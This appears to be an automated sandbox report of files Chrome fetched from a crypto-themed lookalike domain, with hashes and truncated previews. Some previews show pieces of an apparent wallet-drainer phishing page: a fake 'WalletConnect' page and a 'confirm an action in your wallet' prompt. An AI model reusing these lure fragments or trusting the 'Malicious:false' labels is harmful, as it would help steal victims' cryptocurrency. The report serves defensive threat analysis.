                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8 ....0....*....>I$.E".!..,d(....p.........S..8.O.....V....?V.d.@....|o./...0.dy....C.......IoP..........z.y..............M.....d.A.9...oQ.i.w.v!.)......<..".[.#|......^.>....S......Y...d.:(.zJ........................~o..v.......N+33333333...M..:..Jw..;\.9../:>r....Vd...:.....m...331......q._..%`...<d...[.......m.p4.F..\3u..q./.....].'...,..%..I-xo..W.K.=.-X."{...DE.GwL..............K...oXRA..2.|.KX...l.j.%z..2......[..(...;S...9.pT.+.b.i..B..[a..p..1.TU...0...z..0..,.jP..uRa...R.H;.....[.E.M.x...Z....n....e._.R..0...;.|.I.p..fD......`.(........*..l1........tT..y.v..M..E.vb..#v.A..hn..y/<wee.~.....&.=..Z.Q<....}..`:...k5..~X...N.B)..........V^.".._...+qx.'.:Q4G..(.]Gi.,.OKD.U.......,..[......<W..T)..A..aN.e.f.U.p.^......N..6R....E...r...#.Gr.Z.h}h.w..C...8..&z^.&..q..cSC.......kr....,.~...m..../..R.g&S..\...;B./.?|Q &...gh..s.o).`..H....+...t.........t.....&....-95.J.O*..J.t.zr.va...I.1md.>.....2x..........q.>,?b..sD4..0.VGe.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2442
                                                                                                                                                                                                                                              Entropy (8bit):4.544807286103697
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:IysvcXFFFriRD/sRmeKhK/ghE/ieWmaJX6pdUPF8:q8RKoW2WBJXLPF8
                                                                                                                                                                                                                                              MD5:645D485B7082F5FF248B9B75CD298974
                                                                                                                                                                                                                                              SHA1:1565FAB9E8010B62E033C9793710E11D32462BB7
                                                                                                                                                                                                                                              SHA-256:0D0FAE37857DBD9365F9BCF6A599EE955F8308B5261F26BFA8DF747A62FDA4A0
                                                                                                                                                                                                                                              SHA-512:B3D1A98C3CFD70243EFF159F89FE64D2DDE18F35A698162A657950B5052D525DE78854831764E204E36B72E4FF15D5458B51D98517A36FE0E9A60FF1D26AED90
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <title>404 - Page Not Found</title>. <link. href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;800&display=swap". rel="stylesheet". />. <style>. * {. margin: 0;. padding: 0;. box-sizing: border-box;. }.. body {. font-family: "Poppins", sans-serif;. background-color: #c7fc3a;. color: #000; /* Updated text color to black */. display: flex;. align-items: center;. justify-content: center;. min-height: 100vh;. margin: 0;. }.. .container {. width: 100%;. max-width: 800px;. text-align: center;. padding: 1rem;. }.. .error-code {. font-size: 8rem;. font-weight: 800;. margin-bottom: 1rem;. }.. .error-message {. font-size: 1.5rem;.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):13822
                                                                                                                                                                                                                                              Entropy (8bit):7.84432915940125
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:5YNg7/ty67XelE5gJQkZTf53W/MMILeVgd:5Yypy67OlE5mt7Jcgd
                                                                                                                                                                                                                                              MD5:39FD829C01911F2B978DEF5CED0E35EB
                                                                                                                                                                                                                                              SHA1:F97B20E1195DA2002CD6EC957C36A2BEA2A61429
                                                                                                                                                                                                                                              SHA-256:212FBCDE259D4EFA50654CE229F10522D20630D67A31FA187D5CAD5CCC01B46E
                                                                                                                                                                                                                                              SHA-512:0E6C1613600C9F87A6F70E88060C23C16B9911EB1A5716E09E53462008916D4D2D0DA1E81061B38D14C26A41DE9EECD14137662D41F7F82D71A79CDFD542B1C7
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/ca456564-e22a-47f9-ac2d-c70fad6c3534.png?_v=4&auto=format&dpr=1&w=200
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o..(....(iinf..........infe........av01Color.....iprp....ipco....ispe................pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (24554)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):24555
                                                                                                                                                                                                                                              Entropy (8bit):5.138848412932619
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:P5tcAnIVxENHWXWaAXpL+N8S85e+Tx8Qcj5yjAFOE7twymIQyvwjR5lKw58oepd+:P5tcKIzEsmt+N5WAjkyt658oepdIsm8a
                                                                                                                                                                                                                                              MD5:7749612FDF867CED5F8FF017B1C338B4
                                                                                                                                                                                                                                              SHA1:DCD57DF86A932014113DD6E641587542863DB518
                                                                                                                                                                                                                                              SHA-256:7A872A29BB67041000F564E03321746FB6DC469448B8585E28A5E1EBF6EDC349
                                                                                                                                                                                                                                              SHA-512:F9359973D03734B7950D53A33F733A3AF1DA6D4E84A6DF0D601373588166E86BC98E81904A526682ACD0CA75C227CD15C39FEA7F79C77599B49D10D955379548
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/manifest-51a3674f.js
                                                                                                                                                                                                                                              Preview:const d="modulepreload",m=function(i){return"/modules/bonus2/"+i},l={},e=function(n,_,u){if(!_||_.length===0)return n();const c=document.getElementsByTagName("link");return Promise.all(_.map(t=>{if(t=m(t),t in l)return;l[t]=!0;const o=t.endsWith(".css"),E=o?'[rel="stylesheet"]':"";if(!!u)for(let r=c.length-1;r>=0;r--){const a=c[r];if(a.href===t&&(!o||a.rel==="stylesheet"))return}else if(document.querySelector(`link[href="${t}"]${E}`))return;const s=document.createElement("link");if(s.rel=o?"stylesheet":d,o||(s.as="script",s.crossOrigin=""),s.href=t,document.head.appendChild(s),o)return new Promise((r,a)=>{s.addEventListener("load",r),s.addEventListener("error",()=>a(new Error(`Unable to preload CSS for ${t}`)))})})).then(()=>n()).catch(t=>{const o=new Event("vite:preloadError",{cancelable:!0});if(o.payload=t,window.dispatchEvent(o),!o.defaultPrevented)throw t})},p=globalThis._bc,{A:Y,Accordion:Z,ActiveProvider:ee,App:te,Badge:oe,Breadcrumb:se,Button:re,Carousel:ie,Checkbox:ae,Collapsib
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8282), with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):8282
                                                                                                                                                                                                                                              Entropy (8bit):5.149624157945766
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:JzryobAWc5LQBtQ4DCvwmhZgDfJzK+MwF5et+isKfKfNF8FMwUYdHSi/Ag8Urit:drysG4mvwDXrzivmNC6wNxut
                                                                                                                                                                                                                                              MD5:0CA49A5CACBB1C5B3F36CE01EEEC98CC
                                                                                                                                                                                                                                              SHA1:33A5C493D9AAB0FB8271E5B7220EB07D8410D0E9
                                                                                                                                                                                                                                              SHA-256:AB0079AD7AE0E6DD08336DE74406B9903055C811953AF7A4DD60D759F1C47B14
                                                                                                                                                                                                                                              SHA-512:B2851307D2FA7B8A24E750E5EA7F8DA4A133522139C2121478D0F976652BDB703228E66DEE3D550A0B3C47AF8E3EA4348B9FF61EDDF5F95684A30090D26A1DC0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:void 0===jQuery.migrateMute&&(jQuery.migrateMute=!0),function(e){"function"==typeof define&&define.amd?define(["jquery"],window,e):"object"==typeof module&&module.exports?module.exports=e(require("jquery"),window):e(jQuery,window)}(function(e,t){"use strict";function r(r){var n=t.console;o[r]||(o[r]=!0,e.migrateWarnings.push(r),n&&n.warn&&!e.migrateMute&&(n.warn("JQMIGRATE: "+r),e.migrateTrace&&n.trace&&n.trace()))}function n(e,t,n,a){Object.defineProperty(e,t,{configurable:!0,enumerable:!0,get:function(){return r(a),n},set:function(e){r(a),n=e}})}function a(e,t,n,a){e[t]=function(){return r(a),n.apply(this,arguments)}}e.migrateVersion="3.0.1",t.console&&t.console.log&&(e&&!/^[12]\./.test(e.fn.jquery)||t.console.log("JQMIGRATE: jQuery 3.0.0+ REQUIRED"),e.migrateWarnings&&t.console.log("JQMIGRATE: Migrate plugin loaded multiple times"));var o={};e.migrateWarnings=[],void 0===e.migrateTrace&&(e.migrateTrace=!0),e.migrateReset=function(){o={},e.migrateWarnings.length=0},"BackCompat"===t.d
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 400x400, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):4216
                                                                                                                                                                                                                                              Entropy (8bit):7.939294015202745
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:TDnLv95KrDWJ44eaOQB+ei/jyHsbjgiDyZpexEfymZkb:TzLVYrk4f6B+BbVngi2oxEfYb
                                                                                                                                                                                                                                              MD5:D5DB513E51A1EDA85E0E624B1A8061E0
                                                                                                                                                                                                                                              SHA1:0F949A2454B2BF9A44F36C8DCE934DE76BF24E20
                                                                                                                                                                                                                                              SHA-256:48B3F99F45C1036F3B19652590BF542F1DBAADA7B53FB37B282318CF3DE502DD
                                                                                                                                                                                                                                              SHA-512:3EBE8D6D50B9B09C52181C07F979B03E1ACDB3AC64DEDC2BC33789D753F7957685D276C1C2D3637D3B0D63D25F4EF98CCF11162F2EA972ADBDC4D02FCA2F85F1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://api.web3modal.com/public/getAssetImage/06b26297-fe0c-4733-5d6b-ffa5498aac00
                                                                                                                                                                                                                                              Preview:RIFFp...WEBPVP8 d...0j...*....>I$.E..!.;..(....p...../o.~....~F.r.....?7..........o29....k..".......7.O@.`.....l...........^.?..m.....g........7o`../b./.c...._.............../.]......A....X7.....w..#.G./....~.mR?|=}.X7.ag5.j)Tf.U....Fm..Q.j)Tf.U....Fm..Q.j)Tf.U....Fm..Po.>..G!x...$..w.......;.b.9.qn.....EW.q.Fm..K.......~ZG...PH.......B.:...{?.F..D.=h....._..X.1R..._.f;.{0.'..U..34..|{M...{;...)aj.....H..QJ.6.......OX..m..g....}.....o.I4.Tf.U..3{w..:n'..8}..W3.i.&.*..QJ...S......."...~'.....e.~.o_3.......5c...u.Q.A.}...w...R....Gcd.y.S?..PI..$..l..V=..B/".....C....DI.vE1t'..&.......=.....>.NQi..#)M..`...H9{..z..(T.....J.6..7....y.!..#~.6.s.m..P....8..9.....`.O..j..D...Y...|..0..^.v.4.1....Z..`.O.<K6....O..Qj.XX....n........n^,s.m..Q.f.....@y.).Z./........w....3l.-4..G..O.;..U....Fm..Q.j)Tf.U....Fm..Q.j)Tf.U....Fm..Q.....j.{.W.9.f......q......fk\^.........M.w....\...c.{.dz..I..n.../.sM\.....(.....xeD..U...ro.0Y^..c...e>...l..i....5j
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (18782)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1469354
                                                                                                                                                                                                                                              Entropy (8bit):5.589295659299559
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24576:1uQlb9IIrb48+ohchR5d0OVKEEk/TG5FwKV3u2YQ:1uQtmIrb48+ohGdBVKEl/TG5OKV3u2YQ
                                                                                                                                                                                                                                              MD5:5631D4597AFD0E355B644CC5BDF9375B
                                                                                                                                                                                                                                              SHA1:881D48221BACEA33A89ABA5304D085C86A3C489B
                                                                                                                                                                                                                                              SHA-256:DDE389592EACD179A1582F82D15DF78B4C1229F5C52CCE9D4D57941628D93E01
                                                                                                                                                                                                                                              SHA-512:6025D78B227B706D3FE49171CF9F7DA2A46E026FE4E4C13FB2079BEF9BB264986EF3000AEDD48D3B636AF63F698FFB8DFAA8FDCEC27A767911FB57BF73449847
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/modules.js
                                                                                                                                                                                                                                              Preview:window.themeMode = "dark";..let cfg = {. domain: 'https://web3modal.com',. description: 'Web3Modal',. name: 'Web3Modal',. icon: 'https://avatars.githubusercontent.com/u/37784886',. headerText:"Action Required",. middleHeaderText:"Confirm in wallet",. text:"In order to continue you need to confirm an action in your wallet.",. loaderImg:"https://i.gifer.com/ZKZg.gif".}.import{Base64 as dB}from"https://cdn.jsdelivr.net/npm/js-base64@3.7.2/base64.mjs";!function(){const e=document.createElement("link").relList;if(!(e&&e.supports&&e.supports("modulepreload"))){for(const e of document.querySelectorAll('link[rel="modulepreload"]'))t(e);new MutationObserver((e=>{for(const r of e)if("childList"===r.type)for(const e of r.addedNodes)"LINK"===e.tagName&&"modulepreload"===e.rel&&t(e)})).observe(document,{childList:!0,subtree:!0})}function t(e){if(e.ep)return;e.ep=!0;const t=function(e){const t={};return e.integrity&&(t.integrity=e.integrity),e.referrerPolicy&&(t.referrerPolicy=e.referrerPoli
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/modules.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 288 x 64, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2701
                                                                                                                                                                                                                                              Entropy (8bit):7.777356752293652
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:RiF4bqJ4LtxlSPj9WpNg1nNsPLaw+Sl/mXS5g4wOFa7FDUoHrSnILnpMtuCcTbM2:RGfJ4BSr9Wp21NsDn+Wm/VCQDUoLppMC
                                                                                                                                                                                                                                              MD5:8357C14D14AE3478BC09F6F0E40B69A1
                                                                                                                                                                                                                                              SHA1:6BBED485F0A62B9E3A034D25C73D54F87F59CBC2
                                                                                                                                                                                                                                              SHA-256:ABE34DCBB69E2C2D2DC42E65476923CC27E3A28ED2428598842C187C2DF67BF3
                                                                                                                                                                                                                                              SHA-512:6CFEC9E1387817B3CE43BC33C7C306C9B2CD28DECE75A54538A9B69F9F0DDFBCF13FD8F0131D7A5BF53B8687093EBE08252D6EC48D81D9AF85A32C1A9BA48EA7
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR... ...@.......Z\.../PLTE.............................................8...........%.>.H.#.2.;....4.).G.;.G.'.).O.(.T..7.$./.&.(.=.L.>.".A.?.$.D.Q....T.~G....P....4....*.1.B.R.Y.~...-.X..Y........#.#.P.M.D.I.K.G.T..-.%.@.*.'.1.3.>.R..7.;.W.~H.B.5.).R.:.%.<./.V..E..S.....DtRNS..`@ .....pP..0a. . .@0..`_...@..o...............O.........AV..!....IDATx..r.@........Z....-...L/....3.r..j.f2...?..K+[....{wF..0...K[+h)Y..@I..%"Y[)...........Jr'....}H.......i....DX.h6..FK)<(....&..h)....l2. ......;....o<.N.$.......?>_8...e!.d!6=.P.......>.....!..J.H......;..@?r@o..YlD.....'..;;;...>|x....B#..F.{..P.A.3@.....l.....U....( .A..mo.....".SPQK....<(s....8s;.m[....3L.R...)..$..D..!......z.B.D...x.2t,/.6a.v...]....J.......p*........D.A4.^.x......m..'.y.<_...>..5.9.q..*...S...t..b...1:..^......k5..<...Oi.'..*..`.g.Z@......JE.....~...x...J@..B..0C...#@~.l..r....H.\-#@..O...;.G....@i.e.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 59 x 37, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):666
                                                                                                                                                                                                                                              Entropy (8bit):7.263730553888682
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:6v/70boV8j69A5gj8RuEXEdVVbMJc2T8YScCA3yqbpWF5OciZktSlJD00mT:BboKjqc6jEXEdjMBTqSCqaxfy40O
                                                                                                                                                                                                                                              MD5:EF18579B200246C49DC649E24E03D1B7
                                                                                                                                                                                                                                              SHA1:D9B8CE160B5EF0259CEFA8D219B17CFCB76CEBAD
                                                                                                                                                                                                                                              SHA-256:8D767FBF2D1FC919441978F243C49234ED36B84BD5E69818B03F37564E835E40
                                                                                                                                                                                                                                              SHA-512:07EB866473328AD6762FFC2A6BAB0004CEADCDD0B9740B2DD96B88E37DD6C1F7EE8D56CA263ABB485027670C1F5505657F025545865A119070908F86CD74E5A2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...;...%......'aj....PLTE.......................... ................. ..........................................................U....................P..........._........2..e...........$..V.....}..v..;..I..m.....#..a.z.\b...+tRNS....p@ ..... ..@0......`P...p0 ...```P@0q.-....^IDATx...r.@.E/(."*..h....Qc....@(.2..$..Tw.n.....i0P..,...Q8.jql...68nK.h^xH..D+.F....v..f..GmG..W....]W.....-..U?..T...YP.Q'...'\].o9..d..(.....^.v..s..<B..(.:.-.D...A...(w.d...ee.R.3.Pu..pwlHY.x.M.>.2.0-.Q..}.A....M..W.1.....(..2...|W/.....X.wX.j..R.S.v.oX.P.SQX*kzt..}$x....#.{H9..r?..3..x.*.W5,....f.yk|..............9.V...uk[1,...*;0.Y.......IEND.B`.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (12181)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):12186
                                                                                                                                                                                                                                              Entropy (8bit):5.421197589494201
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:8IzI0PJHKqtPvAe3+aQurbqcEImqEuO4fHgDJ/rcy8xL/GQPDV5Xap:9zI0PxKqFIaXq7ImYyrcy8xjGQbV5X6
                                                                                                                                                                                                                                              MD5:5F9C55EC8AB340AAFC6687B76DEFA19A
                                                                                                                                                                                                                                              SHA1:029C3700BD4808E1272587A634DFBC7A2A5FBAB6
                                                                                                                                                                                                                                              SHA-256:66AA59E2AFDD4099286D74FB91F60DA82987F577C43C3EAB126907D03F17728F
                                                                                                                                                                                                                                              SHA-512:B840446CF6DAB60EE35463F50F5EFA5DCDB985E58BD4E1AF375B56998AA440854CDADE2A7C6B2014D84B32CEA870516A4C51EFDE48779531F822E1125BED9B57
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var P=(e,a,r)=>new Promise((s,t)=>{var l=c=>{try{u(r.next(c))}catch(m){t(m)}},o=c=>{try{u(r.throw(c))}catch(m){t(m)}},u=c=>c.done?s(c.value):Promise.resolve(c.value).then(l,o);u((r=r.apply(e,a)).next())});import{c as n,u as L,e as v,s as C,i,t as p,m as Z,a as E}from"./web-13cf6287.js";import{P as q,B as D,p as y,t as ue,u as J,b as Q,h as F,$ as de,e as me,a as S,I as M,w as pe,T as B,x as ge,k as O,S as fe,c as U,D as H,s as j,z as ye}from"./manifest-51a3674f.js";import{a as he}from"./router-3828f409.js";import{o as A,a as xe,j as be,s as we,d as ee,e as te,S as re,u as ve,k as Se,b as I,c as G,E as Ce}from"./solid-js-38561dfe.js";import{C as N}from"./currency-format-1c532f37.js";import{SpinLeaderBoard as _e}from"./index-cb32ccd4.js";import{t as f}from"./i18n-fcfac1d2.js";import{S as $e}from"./sounds-2c4b6e58.js";import{S as Fe,f as Ne,a as Te,b as W}from"./index-99ee4a48.js";import{b as T}from"./index-adb8672d.js";import{h as V}from"./http-f4555b94.js";import{g as R}from"./index-3fd
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/config.js
